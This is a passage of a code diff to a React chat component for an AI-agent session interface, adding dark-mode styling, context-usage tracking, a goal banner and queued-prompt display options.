+    <div className="mb-2 overflow-hidden rounded-xl border border-zinc-200 bg-zinc-950/[0.02] dark:border-zinc-800 dark:bg-zinc-900/60">
       <button
         type="button"
         onClick={onToggle}
-        className="flex w-full items-center gap-2 px-3 py-2 text-left text-xs font-medium text-zinc-600 hover:bg-zinc-100/70 transition-colors"
+        className="flex w-full items-center gap-2 px-3 py-2 text-left text-xs font-medium text-zinc-600 transition-colors hover:bg-zinc-100/70 dark:text-zinc-300 dark:hover:bg-zinc-800"
       >
         <ChevronDown className={`h-3.5 w-3.5 transition-transform ${expanded ? '' : '-rotate-90'}`} />
         <span>{t('chat.queue.count', { count: items.length })}</span>
       </button>
       {expanded && (
-        <div className="max-h-40 overflow-y-auto border-t border-zinc-200">
+        <div className="max-h-40 overflow-y-auto border-t border-zinc-200 dark:border-zinc-800">
           {items.map((item) => {
             const isEditing = editingId === item.id;
             const isBusy = actionId === item.id || item.status === 'executing';
             const text = getQueuedPromptText(item);
+            const instructionLabel = parseInstructionDisplayText(text);
             return (
-              <div key={item.id} className="flex items-start gap-2 px-3 py-2 border-b border-zinc-100 last:border-b-0">
-                <div className="mt-1 h-2 w-2 rounded-full border border-zinc-400 flex-shrink-0" />
+              <div key={item.id} className="flex items-start gap-2 border-b border-zinc-100 px-3 py-2 last:border-b-0 dark:border-zinc-800">
+                <div className="mt-1 h-2 w-2 flex-shrink-0 rounded-full border border-zinc-400 dark:border-zinc-500" />
                 <div className="min-w-0 flex-1">
                   {isEditing ? (
                     <textarea
                       value={editingText}
                       onChange={(event) => onEditChange(event.target.value)}
-                      className="w-full resize-none rounded-lg border border-zinc-200 bg-white px-2 py-1.5 text-xs text-zinc-800 outline-none focus:border-zinc-300 focus:ring-2 focus:ring-zinc-100"
+                      className="w-full resize-none rounded-lg border border-zinc-200 bg-white px-2 py-1.5 text-xs text-zinc-800 outline-none focus:border-zinc-300 focus:ring-2 focus:ring-zinc-100 dark:border-zinc-800 dark:bg-zinc-950 dark:text-zinc-100 dark:focus:border-zinc-700 dark:focus:ring-zinc-800/70"
                       rows={2}
                     />
                   ) : (
-                    <div className="line-clamp-2 text-xs text-zinc-700">{text || t('chat.queue.attachmentOnly')}</div>
+                    instructionLabel ? (
+                      <span className="inline-flex max-w-full items-center truncate rounded-md border border-rose-100 bg-rose-50 px-2 py-1 text-xs font-semibold leading-none text-rose-700 dark:border-rose-500/30 dark:bg-rose-950/30 dark:text-rose-200">
+                        {instructionLabel}
+                      </span>
+                    ) : (
+                      <div className="line-clamp-2 text-xs text-zinc-700 dark:text-zinc-300">{text || t('chat.queue.attachmentOnly')}</div>
+                    )
                   )}
                 </div>
                 <div className="flex flex-shrink-0 items-center gap-1">
@@ -734,7 +1300,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onEditSave(item)}
                         disabled={isBusy || !editingText.trim()}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.save')}
                       >
                         <Save className="h-3.5 w-3.5" />
@@ -743,7 +1309,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={onEditCancel}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.cancel')}
                       >
                         <X className="h-3.5 w-3.5" />
@@ -755,7 +1321,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onEditStart(item)}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.queue.edit')}
                       >
                         <Pencil className="h-3.5 w-3.5" />
@@ -764,7 +1330,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onRunNow(item)}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-zinc-200 hover:text-zinc-800 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-zinc-800 dark:hover:text-zinc-100"
                         title={t('chat.queue.runNow')}
                       >
                         <ArrowUp className="h-3.5 w-3.5" />
@@ -773,7 +1339,7 @@ function QueuedPromptPanel({
                         type="button"
                         onClick={() => onRemove(item)}
                         disabled={isBusy}
-                        className="rounded p-1 text-zinc-500 hover:bg-red-50 hover:text-red-600 disabled:opacity-40"
+                        className="rounded p-1 text-zinc-500 hover:bg-red-50 hover:text-red-600 disabled:opacity-40 dark:text-zinc-400 dark:hover:bg-red-950/40 dark:hover:text-red-300"
                         title={t('chat.queue.remove')}
                       >
                         <Trash2 className="h-3.5 w-3.5" />
@@ -856,6 +1422,8 @@ export default function SessionChat({
   const fullWidth = display?.fullWidth ?? false;
   const showActions = display?.showActions ?? false;
   const showTimestamp = display?.showTimestamp ?? false;
+  const collapseIntermediateSteps = display?.collapseIntermediateSteps ?? false;
+  const processGroupsDefaultOpen = display?.processGroupsDefaultOpen ?? false;
   const effectiveComposerTextareaMinHeight = composerTextareaMinHeight ?? 24;
   const effectiveComposerTextareaMaxHeight = composerTextareaMaxHeight ?? (compact ? 96 : 200);
   const effectivePlaceholder = placeholder ?? t('chat.placeholder');
@@ -866,6 +1434,7 @@ export default function SessionChat({
   const [input, setInput] = useState<string>(() => readChatDraft(sessionId));
   const [sending, setSending] = useState(false);
   const [isStreaming, setIsStreaming] = useState(false);
+  const activeToolPartIdsRef = useRef<Set<string>>(new Set());
   const [attachments, setAttachments] = useState<ComposerAttachment[]>([]);
   const [isDragOver, setIsDragOver] = useState(false);
   // Lightbox preview for composer thumbnails. Shares the same overlay
@@ -874,6 +1443,8 @@ export default function SessionChat({
   const [composerPreview, setComposerPreview] = useState<{ url: string; alt?: string } | null>(null);
   const [isCompacting, setIsCompacting] = useState(false);
   const [compactingMessage, setCompactingMessage] = useState('');
+  const [goalBanner, setGoalBanner] = useState<GoalBannerState | null>(null);
+  const [dismissedGoalKey, setDismissedGoalKey] = useState(() => readDismissedGoalKey(sessionId));
   const [queuedPrompts, setQueuedPrompts] = useState<QueuedPrompt[]>([]);
   const [queueExpanded, setQueueExpanded] = useState(true);
   const [editingQueueId, setEditingQueueId] = useState<string | null>(null);
@@ -938,12 +1509,19 @@ export default function SessionChat({
   const [editingRole, setEditingRole] = useState<Message['role'] | null>(null);
   const [editingText, setEditingText] = useState('');
   const [actionMessageId, setActionMessageId] = useState<string | null>(null);
+  const [contextUsageSnapshot, setContextUsageSnapshot] = useState<ContextUsageSnapshot | null>(null);
+  const [contextUsageRefreshing, setContextUsageRefreshing] = useState(false);
+  const [contextUsageWindowTokens, setContextUsageWindowTokens] = useState(0);
+  const contextUsageRequestRef = useRef<{ sessionId: string; promise: Promise<void> } | null>(null);
+  const contextUsageRequestSeqRef = useRef(0);
+  const lastContextUsagePushAtRef = useRef(0);
   const isCompactingRef = useRef(false);
   const prevStreamingRef = useRef(false);
   // Tracks "sessionId::message" key to prevent double-send in React StrictMode
   const initialMessageSentRef = useRef('');
   const abortingRef = useRef(false);
   const sessionBusyRef = useRef(false);
+  const goalHydrationVersionRef = useRef(0);
   // ID of the assistant message that was aborted; used to ignore its finish event
   const abortedMessageIdRef = useRef<string | null>(null);
   const statusCheckedRef = useRef<string | null>(null);
@@ -957,6 +1535,7 @@ export default function SessionChat({
     clearAll: clearPendingQuestions,
   } = usePendingQuestions();
   const messagesEndRef = useRef<HTMLDivElement>(null);
+  const messagesContentRef = useRef<HTMLDivElement>(null);
   const scrollContainerRef = useRef<HTMLDivElement>(null);
   const isAtBottomRef = useRef(true);
   const textareaRef = useRef<HTMLTextAreaElement>(null);
@@ -1028,17 +1607,24 @@ export default function SessionChat({
     truncateAfterMessage,
   } =
     useSessionMessages(sessionId || undefined);
-  const estimatedContextTokens = useMemo(
-    () => estimateContextTokens(messages, input),
-    [messages, input],
+  const contextUsageMessages = contextUsageRefreshing && !contextUsageSnapshot ? [] : messages;
+  const contextUsageBreakdown = useMemo(
+    () => buildContextUsageBreakdown(contextUsageMessages, input, contextUsageSnapshot),
+    [contextUsageMessages, input, contextUsageSnapshot],
   );
-  const contextUsagePercent = contextWindowTokens && contextWindowTokens > 0
-    ? Math.min(100, Math.round((estimatedContextTokens / contextWindowTokens) * 100))
+  const estimatedContextTokens = contextUsageBreakdown.usedTokens;
+  const resolvedContextWindowTokens = contextUsageSnapshot?.contextWindow && contextUsageSnapshot.contextWindow > 0
+    ? contextUsageSnapshot.contextWindow
+    : contextUsageWindowTokens > 0
+      ? contextUsageWindowTokens
+    : (contextWindowTokens || 0);
+  const contextUsagePercent = resolvedContextWindowTokens > 0
+    ? Math.min(100, Math.round((estimatedContextTokens / resolvedContextWindowTokens) * 100))
     : 0;
-  const contextUsageTitle = contextWindowTokens && contextWindowTokens > 0
+  const contextUsageTitle = resolvedContextWindowTokens > 0
     ? t('chat.contextUsageTitle', {
         used: formatTokenCount(estimatedContextTokens),
-        total: formatTokenCount(contextWindowTokens),
+        total: formatTokenCount(resolvedContextWindowTokens),
         percent: contextUsagePercent,
       })
     : t('chat.contextUsageUnknown');
@@ -1064,6 +1650,85 @@ export default function SessionChat({
     }
   }, [sessionId]);
 
+  const refreshContextUsage = useCallback((options?: { clear?: boolean; skipIfFreshMs?: number }) => {
+    if (!sessionId) {
+      setContextUsageSnapshot(null);
+      setContextUsageRefreshing(false);
+      setContextUsageWindowTokens(0);
+      contextUsageRequestSeqRef.current += 1;
+      contextUsageRequestRef.current = null;
+      lastContextUsagePushAtRef.current = 0;
+      return;
+    }
+    if (options?.clear) {
+      setContextUsageSnapshot(null);
+      setContextUsageRefreshing(true);
+      contextUsageRequestSeqRef.current += 1;
+      contextUsageRequestRef.current = null;
+      lastContextUsagePushAtRef.current = 0;
+    } else if (
+      options?.skipIfFreshMs &&
+      Date.now() - lastContextUsagePushAtRef.current < options.skipIfFreshMs
+    ) {
+      return;
+    }
+
+    const existingRequest = contextUsageRequestRef.current;
+    if (existingRequest?.sessionId === sessionId) {
+      return existingRequest.promise;
+    }
+
+    const requestSessionId = sessionId;
+    const requestSeq = contextUsageRequestSeqRef.current;
+    const request = sessionApi.getContextUsage(requestSessionId).then((snapshot) => {
+      if (requestSeq === contextUsageRequestSeqRef.current && snapshot.sessionID === sessionId) {
+        setContextUsageSnapshot(snapshot);
+        if (snapshot.contextWindow && snapshot.contextWindow > 0) {
+          setContextUsageWindowTokens(snapshot.contextWindow);
+        }
+        setContextUsageRefreshing(false);
+      }
+    }).catch((err) => {
+      setContextUsageRefreshing(false);
+      console.warn('[SessionChat] Failed to fetch context usage:', err);
+    }).finally(() => {
+      if (contextUsageRequestRef.current?.promise === request) {
+        contextUsageRequestRef.current = null;
+      }
+    });
+    contextUsageRequestRef.current = { sessionId: requestSessionId, promise: request };
+    return request;
+  }, [sessionId]);
+
+  useEffect(() => {
+    void refreshContextUsage({ clear: true });
+  }, [refreshContextUsage]);
+
+  useEffect(() => {
+    goalHydrationVersionRef.current += 1;
+    const hydrationVersion = goalHydrationVersionRef.current;
+
+    if (!sessionId) {
+      setGoalBanner(null);
+      setDismissedGoalKey('');
+      return;
+    }
+
+    setGoalBanner(null);
+    setDismissedGoalKey(readDismissedGoalKey(sessionId));
+
+    sessionApi.get(sessionId).then((session) => {
+      if (goalHydrationVersionRef.current !== hydrationVersion) return;
+      setGoalBanner(toGoalBannerState(session.goal));
+      setDismissedGoalKey(readDismissedGoalKey(sessionId));
+    }).catch((err) => {
+      if (goalHydrationVersionRef.current !== hydrationVersion) return;
+      setGoalBanner(null);
+      setDismissedGoalKey(readDismissedGoalKey(sessionId));
+      console.warn('[SessionChat] Failed to fetch session goal:', err);
+    });
+  }, [sessionId]);
+
   const handleSSEEvent = useCallback(
     (event: SSEChatEvent) => {
       const { type, properties } = event;
@@ -1077,9 +1742,16 @@ export default function SessionChat({
       if (type === 'session.cleared' && properties.sessionID === sessionId) {
         abortingRef.current = false;
         sessionBusyRef.current = false;
+        activeToolPartIdsRef.current.clear();
         abortedMessageIdRef.current = null;
+        setContextUsageSnapshot(null);
+        setContextUsageRefreshing(true);
+        setContextUsageWindowTokens(0);
         setIsStreaming(false);
+        setGoalBanner(null);
+        setDismissedGoalKey('');
         refetch();
+        void refreshContextUsage({ clear: true });
       } else if (
         (type === 'session.status' && properties.sessionID === sessionId)
         || (type === 'session.updated' && properties.id === sessionId && properties.status === 'idle')
@@ -1101,12 +1773,14 @@ export default function SessionChat({
           setCompactionStages([]);
         } else if (statusType === 'idle') {
           sessionBusyRef.current = false;
+          activeToolPartIdsRef.current.clear();
           setIsStreaming(false);
           setIsCompacting(false);
           isCompactingRef.current = false;
           setCompactingMessage('');
           setCompactionStages([]);
           refetch();
+          void refreshContextUsage({ skipIfFreshMs: 500 });
         }
       } else if (type === 'message.updated' && properties.info?.sessionID === sessionId) {
         updateMessage(properties.info);
@@ -1120,10 +1794,11 @@ export default function SessionChat({
           // would replace the visible partial response with an empty message.
           if (shouldRefetch) {
             refetch();
-            if (!sessionBusyRef.current) {
+            if (!sessionBusyRef.current && activeToolPartIdsRef.current.size === 0) {
               setIsStreaming(false);
             }
           }
+          void refreshContextUsage();
           abortingRef.current = false;
           abortedMessageIdRef.current = null;
         } else if (
@@ -1134,6 +1809,15 @@ export default function SessionChat({
           setIsStreaming(true);
         }
       } else if (type === 'message.part.updated' && properties.part?.sessionID === sessionId) {
+        const part = properties.part as Pick<MessagePart, 'id' | 'type' | 'state'>;
+        if (part.id) {
+          if (isActiveToolPart(part)) {
+            activeToolPartIdsRef.current.add(part.id);
+            if (!abortingRef.current) setIsStreaming(true);
+          } else {
+            activeToolPartIdsRef.current.delete(part.id);
+          }
+        }
         updateMessagePart(properties.part, properties.delta);
         scrollToBottom();
       } else if (type === 'question.asked' && properties.sessionID === sessionId) {
@@ -1155,6 +1839,9 @@ export default function SessionChat({
         const stage = properties.stage as CompactionStage | undefined;
         const data = (properties.data ?? {}) as Record<string, unknown>;
         if (!stage) return;
+        if (stage === 'complete' && data.result === 'continue') {
+          void refreshContextUsage({ skipIfFreshMs: 500 });
+        }
         // Single source of truth: append into ``compactionStages`` and let
         // the progress bar derive ``done/total`` from it via useMemo.
         // ``chunk_done`` arrives in non-deterministic order under
@@ -1175,12 +1862,33 @@ export default function SessionChat({
         const items = Array.isArray(properties.items) ? properties.items : [];
         setQueuedPrompts(items as QueuedPrompt[]);
         if (items.length > 0) setQueueExpanded(true);
+      } else if (type === 'session.goal.updated' && properties.sessionID === sessionId) {
+        const nextGoal = toGoalBannerState(properties as SessionGoalState);
+        if (nextGoal) {
+          goalHydrationVersionRef.current += 1;
+          setGoalBanner(nextGoal);
+          setDismissedGoalKey(readDismissedGoalKey(sessionId));
+        }
+      } else if (type === 'context.compacted' && properties.sessionID === sessionId) {
+        void refreshContextUsage({ skipIfFreshMs: 500 });
+      } else if (type === 'context.usage.updated' && properties.sessionID === sessionId) {
+        setContextUsageSnapshot(properties as ContextUsageSnapshot);
+        if (typeof properties.contextWindow === 'number' && properties.contextWindow > 0) {
+          setContextUsageWindowTokens(properties.contextWindow);
+        }
+        contextUsageRequestSeqRef.current += 1;
+        contextUsageRequestRef.current = null;
+        lastContextUsagePushAtRef.current = Date.now();
+        setContextUsageRefreshing(false);
       } else if (type === 'session.error' && properties.sessionID === sessionId) {
         setIsStreaming(false);
         setIsCompacting(false);
         setCompactionStages([]);
+        setContextUsageRefreshing(false);
+        void refreshContextUsage({ skipIfFreshMs: 500 });
         abortingRef.current = false;
         sessionBusyRef.current = false;
+        activeToolPartIdsRef.current.clear();
         onError?.(properties.error?.message || t('chat.placeholder'));
       }
     },
@@ -1189,6 +1897,7 @@ export default function SessionChat({
       updateMessage,
       updateMessagePart,
       refetch,
+      refreshContextUsage,
       handleQuestionAsked,
       removeByRequestId,
       onSSEEvent,
@@ -1202,10 +1911,15 @@ export default function SessionChat({
       try {
         await submitAnswer(callID, requestId, answers);
       } catch (err: unknown) {
-        alert(`Submit failed: ${err instanceof Error ? err.message : String(err)}`);
+        const message = err instanceof Error ? err.message : String(err);
+        if (onError) {
+          onError(message);
+        } else {
+          toast.error(t('chat.questionSubmitFailed', 'Submit failed'), message);
+        }
       }
     },
-    [submitAnswer],
+    [onError, submitAnswer, t, toast],
   );
 
   const handleQuestionReject = useCallback(
@@ -1213,10 +1927,15 @@ export default function SessionChat({
       try {
         await submitReject(callID, requestId);
       } catch (err: unknown) {
-        alert(`Cancel failed: ${err instanceof Error ? err.message : String(err)}`);
+        const message = err instanceof Error ? err.message : String(err);
+        if (onError) {
+          onError(message);
+        } else {
+          toast.error(t('chat.questionCancelFailed', 'Cancel failed'), message);
+        }
       }
     },
-    [submitReject],
+    [onError, submitReject, t, toast],
   );
 
   const { status: sseStatus } = useSSE({
@@ -1225,6 +1944,7 @@ export default function SessionChat({
     onReconnect: () => {
       if (!sessionId) return;
       refetch();
+      refreshContextUsage();
       fetchPromptQueue();
       fetchPendingQuestions(sessionId).catch((err) => {
         console.warn('[SessionChat] Failed to recover pending questions after reconnect:', err);
@@ -1244,6 +1964,18 @@ export default function SessionChat({
     scrollToBottom();
   }, [messages, scrollToBottom]);
 
+  useEffect(() => {
+    if (!isStreaming && !sending && !isCompacting) return;
+    const target = messagesContentRef.current;
+    if (!target || typeof ResizeObserver === 'undefined') return;
+
+    const observer = new ResizeObserver(() => {
+      scrollToBottom();
+    });
+    observer.observe(target);
+    return () => observer.disconnect();
+  }, [isStreaming, sending, isCompacting, scrollToBottom]);
+
   // Auto-resize textarea
   const autoResize = useCallback(() => {
     const el = textareaRef.current;
@@ -1271,10 +2003,13 @@ export default function SessionChat({
     setIsCompacting(false);
     setCompactingMessage('');
     setCompactionStages([]);
+    setGoalBanner(null);
+    setDismissedGoalKey('');
     setQueuedPrompts([]);
     setEditingQueueId(null);
     setEditingQueueText('');
     setQueueActionId(null);
+    setContextUsageWindowTokens(0);
     setMentionRange(null);
     setMentionQuery('');
     setSelectedMentionIndex(0);
@@ -1654,6 +2389,12 @@ export default function SessionChat({
         arguments: args,
         agent: agentName,
       });
+      if (command === 'goal' && args.trim()) {
+        goalHydrationVersionRef.current += 1;
+        writeDismissedGoalKey(sessionId, '');
+        setGoalBanner({ objective: args.trim(), status: 'active' });
+        setDismissedGoalKey('');
+      }
     } catch (err: unknown) {
       setIsStreaming(false);
       const axiosErr = err as any;
@@ -1669,9 +2410,15 @@ export default function SessionChat({
   };
 
   /** Core send logic */
-  const sendText = async (text: string, imageParts: ImagePartData[] = [], agentOverride?: string) => {
+  const sendText = async (
+    text: string,
+    imageParts: ImagePartData[] = [],
+    agentOverride?: string,
+    options?: PromptDisplayOptions,
+  ) => {
     if (!sessionId) return;
     const effectiveAgent = agentOverride || agentName;
+    const visibleText = options?.displayText || text;
     // Clear abort state immediately so SSE events for the new stream are not suppressed
     abortingRef.current = false;
     // Force scroll to bottom when user sends a new message
@@ -1682,7 +2429,7 @@ export default function SessionChat({
 
     const tempId = `temp-${Date.now()}`;
     const tempParts: MessagePart[] = [];
-    if (text) tempParts.push({ id: `${tempId}-text`, type: 'text', text });
+    if (visibleText) tempParts.push({ id: `${tempId}-text`, type: 'text', text: visibleText });
     imageParts.forEach((img, i) => {
       tempParts.push({ id: `${tempId}-img-${i}`, type: 'file', url: img.url, mime: img.mime, filename: img.filename });
     });
@@ -1691,7 +2438,7 @@ export default function SessionChat({
       id: tempId,
       sessionID: sessionId,
       role: 'user',
-      parts: tempParts.length > 0 ? tempParts : [{ id: `${tempId}-part`, type: 'text', text }],
+      parts: tempParts.length > 0 ? tempParts : [{ id: `${tempId}-part`, type: 'text', text: visibleText }],
       timestamp: Date.now(),
       agent: effectiveAgent,
     } as Message);
@@ -1702,6 +2449,7 @@ export default function SessionChat({
       };
       if (effectiveAgent) payload.agent = effectiveAgent;
       if (model) payload.model = model;
+      if (options?.displayText) payload.displayText = options.displayText;
 
       await client.post(`/api/session/${sessionId}/prompt_async`, payload);
     } catch (err: unknown) {
@@ -1722,6 +2470,7 @@ export default function SessionChat({
     text: string,
     imageParts: ImagePartData[] = [],
     agentOverride?: string,
+    options?: PromptDisplayOptions,
   ) => {
     if (!sessionId) return;
     const effectiveAgent = agentOverride || agentName;
@@ -1730,6 +2479,7 @@ export default function SessionChat({
         parts: buildPromptParts(text, imageParts),
         ...(effectiveAgent ? { agent: effectiveAgent } : {}),
         ...(model ? { model } : {}),
+        ...(options?.displayText ? { displayText: options.displayText } : {}),
       });
       await fetchPromptQueue();
       setQueueExpanded(true);
@@ -1744,7 +2494,7 @@ export default function SessionChat({
     }
   };
 
-  const handleComposerPrompt = async (text: string) => {
+  const handleComposerPrompt = async (text: string, options?: PromptDisplayOptions) => {
     const trimmed = text.trim();
     if (!trimmed || sending) return;
 
@@ -1755,7 +2505,7 @@ export default function SessionChat({
 
     if (sessionId && isStreaming) {
       try {
-        await enqueueText(trimmed);
+        await enqueueText(trimmed, [], undefined, options);
       } catch {
         setInput(trimmed);
       }
@@ -1771,7 +2521,7 @@ export default function SessionChat({
       setSending(true);
       try {
         setPendingAgentName(agentName || 'rex');
-        await onCreateAndSend(trimmed, [], agentName);
+        await onCreateAndSend(trimmed, [], agentName, model, options);
       } catch {
         setInput(trimmed);
       } finally {
@@ -1781,7 +2531,7 @@ export default function SessionChat({
     }
 
     try {
-      await sendText(trimmed, [], agentName);
+      await sendText(trimmed, [], agentName, options);
     } catch {
       setInput(trimmed);
     }
@@ -1848,8 +2598,9 @@ export default function SessionChat({
       if (onCreateAndSend) {
         setSending(true);
         try {
-          setPendingAgentName(mentionedAgent || 'rex');
-          await onCreateAndSend(text, imageParts, mentionedAgent || undefined, model);
+          const effectiveAgent = mentionedAgent || agentName;
+          setPendingAgentName(effectiveAgent || 'rex');
+          await onCreateAndSend(text, imageParts, effectiveAgent || undefined, model);
           setAttachments([]);
         } catch {
           // Restore both the text and the attachment list so the user can
@@ -2074,6 +2825,16 @@ export default function SessionChat({
         const msgs: any[] = res.data || [];
         const lastMsg = msgs[msgs.length - 1];
         if (lastMsg?.info?.role === 'assistant' && (lastMsg.info.finish || lastMsg.info.time?.completed)) {
+          const hasFetchedActiveTool = msgs.some((msg) => hasActiveToolPart(msg.parts));
+          if (hasFetchedActiveTool) {
+            return;
+          }
+          activeToolPartIdsRef.current.clear();
+          const statusRes = await client.get('/api/session/status');
+          const status = statusRes.data?.[sessionId];
+          if (isActiveSessionStatus(status)) {
+            return;
+          }
           refetch();
           setIsStreaming(false);
         }
@@ -2212,18 +2973,12 @@ export default function SessionChat({
     }
   }, [editingMessageId, messages, resetEditingState]);
 
-  // ── Merged messages with compaction grouping ──
-  // The compaction divider is rendered at the position of the FIRST
-  // compacted message (not the summary), so it appears before the
-  // preserved messages rather than after them.
-  const { merged, compactedGroupMap, summaryRedirectMap, skipIndices } = useMemo(() => {
+  // ── Merged messages ──
+  // Archived-by-compaction messages stay visible in the UI timeline. The
+  // summary message itself renders as a divider, so multiple compactions
+  // naturally appear as multiple chronological separators.
+  const { merged, skipIndices } = useMemo(() => {
     const merged = mergeConsecutiveAssistantMessages(messages);
-    const compactedGroupMap = new Map<number, MergedMessage[]>();
-    // Maps: first-compacted-index → summary-message-index, so we can
-    // render the summary message at the earlier position.
-    const summaryRedirectMap = new Map<number, number>();
-    const compactedBuffer: MergedMessage[] = [];
-    let firstCompactedIdx = -1;
     const skipIndices = new Set<number>();
 
     for (let idx = 0; idx < merged.length; idx++) {
@@ -2236,44 +2991,27 @@ export default function SessionChat({
         skipIndices.add(idx);
         continue;
       }
-      if (msg.compacted) {
-        if (compactedBuffer.length === 0) firstCompactedIdx = idx;
-        compactedBuffer.push(msg);
-        skipIndices.add(idx);
-      } else if (msg.finish === 'summary' && compactedBuffer.length > 0) {
-        // Render the divider at the first compacted message's position
-        skipIndices.delete(firstCompactedIdx);
-        compactedGroupMap.set(firstCompactedIdx, [...compactedBuffer]);
-        summaryRedirectMap.set(firstCompactedIdx, idx);
-        // Skip the summary at its natural (later) position
-        skipIndices.add(idx);
-        compactedBuffer.length = 0;
-        firstCompactedIdx = -1;
-      }
-    }
-
-    // Orphaned compacted messages (no summary found yet — e.g. compaction
-    // still in progress or summary missed during SSE race).  Un-skip them
-    // so they remain visible rather than silently disappearing.
-    if (compactedBuffer.length > 0) {
-      for (const orphan of compactedBuffer) {
-        const orphanIdx = merged.indexOf(orphan);
-        if (orphanIdx >= 0) skipIndices.delete(orphanIdx);
-      }
-      compactedBuffer.length = 0;
     }
 
-    return { merged, compactedGroupMap, summaryRedirectMap, skipIndices };
+    return { merged, skipIndices };
   }, [messages]);
 
   // ── Styling based on compact mode ──
   const msgAreaClass = compact
-    ? 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 px-4 py-4'
-    : 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 py-6';
+    ? 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 px-4 py-4 dark:bg-zinc-950'
+    : 'relative flex flex-col flex-1 min-h-0 overflow-y-auto bg-gray-50 py-6 dark:bg-zinc-950';
 
   const msgListClass = compact
     ? fullWidth ? 'space-y-3 w-full px-4' : 'space-y-3'
-    : fullWidth ? 'space-y-5 w-full px-5' : 'space-y-5 w-[min(76%,64rem)] mx-auto pl-4 pr-8';
+    : fullWidth ? 'space-y-5 w-full px-5' : 'space-y-5 w-[min(76%,64rem)] mx-auto px-6';
+  const visibleGoalBanner = goalBanner && getGoalBannerKey(goalBanner) !== dismissedGoalKey
+    ? goalBanner
+    : null;
+  const handleDismissGoalBanner = useCallback(() => {
+    const goalKey = getGoalBannerKey(visibleGoalBanner);
+    writeDismissedGoalKey(sessionId, goalKey);
+    setDismissedGoalKey(goalKey);
+  }, [sessionId, visibleGoalBanner]);
 
   return (
     <div className={`flex flex-col min-h-0 ${className}`}>
@@ -2303,27 +3041,26 @@ export default function SessionChat({
             <div className="text-center py-8 text-gray-400 text-sm">{effectiveEmptyText}</div>
           )
         ) : (
-          <div className={msgListClass}>
+          <div ref={messagesContentRef} className={msgListClass}>
             {merged.map((msg, i) => {
               if (skipIndices.has(i)) return null;
-              // If this position is a redirect, render the summary message here
-              const redirectIdx = summaryRedirectMap.get(i);
-              const messageToRender = redirectIdx !== undefined ? merged[redirectIdx] : msg;
               return (
                 <ChatMessageBubble
-                  key={messageToRender.id}
-                  message={messageToRender}
+                  key={msg.id}
+                  message={msg}
                   isActive={
                     isStreaming &&
                     i === merged.length - 1 &&
-                    messageToRender.role === 'assistant' &&
-                    !messageToRender.finish
+                    msg.role === 'assistant' &&
+                    !msg.finish
                   }
                   pendingQuestions={pendingQuestions}
                   onQuestionAnswer={handleQuestionAnswer}
                   onQuestionReject={handleQuestionReject}
                   showActions={showActions}
                   showTimestamp={showTimestamp}
+                  collapseIntermediateSteps={collapseIntermediateSteps}
+                  processGroupsDefaultOpen={processGroupsDefaultOpen}
                   compact={compact}
                   onCopy={handleCopy}
                   editingMessageId={editingMessageId}
@@ -2336,7 +3073,6 @@ export default function SessionChat({
                   onEditSave={handleSaveEditedMessage}
                   onEditSend={handleSendEditedUserMessage}
                   onRegenerate={handleRegenerateMessage}
-                  compactedMessages={compactedGroupMap.get(i)}
                 />
               );
             })}
@@ -2344,20 +3080,20 @@ export default function SessionChat({
             {/* Compacting indicator with live progress stages */}
             {isCompacting && (
               <div className={`group relative ${!compact ? 'w-full' : ''} flex`}>
-                <div className={`flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}`}>
+                <div className={compact ? `flex gap-2.5 ${getMessageGroupClassName({ compact, isUser: false, isEditing: false })}` : 'flex w-full min-w-0'}>
                   <span
-                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 ${
+                    className={`inline-flex items-center justify-center rounded-full bg-red-500 text-white font-bold shadow-sm ring-2 ring-white flex-shrink-0 dark:ring-zinc-950 ${
                       compact ? 'w-7 h-7 text-xs' : 'w-8 h-8 text-sm'
-                    }`}
+                    } ${compact ? '' : 'absolute -left-10 top-1'}`}
                   >
                     {formatAgentName(pendingAgentName).charAt(0).toUpperCase()}
                   </span>
                   <div className="flex flex-col items-start flex-1 min-w-0">
                     <div className={`flex items-center gap-2 ${compact ? 'h-7' : 'h-8'}`}>
-                      <span className="text-xs font-semibold text-zinc-700">{formatAgentName(pendingAgentName)}</span>
+                      <span className="text-xs font-semibold text-zinc-700 dark:text-zinc-300">{formatAgentName(pendingAgentName)}</span>
                     </div>
                     <div className="flex flex-col min-w-0 w-full">
-                      <div className={`${compact ? 'max-w-[90%] px-4 py-3 rounded-[20px]' : 'w-full px-5 py-4 rounded-[24px]'} text-sm break-words shadow-sm bg-amber-50 border border-amber-200`}>
+                      <div className={`${compact ? 'w-full max-w-full px-4 py-3 rounded-[20px]' : 'w-full px-5 py-4 rounded-[24px]'} text-sm break-words shadow-sm bg-amber-50 border border-amber-200 dark:border-amber-500/35 dark:bg-amber-950/30 dark:shadow-none`}>
                         <div className="flex items-center gap-2 text-sm text-amber-700">
                           <Loader2 className="w-4 h-4 animate-spin text-amber-500" />
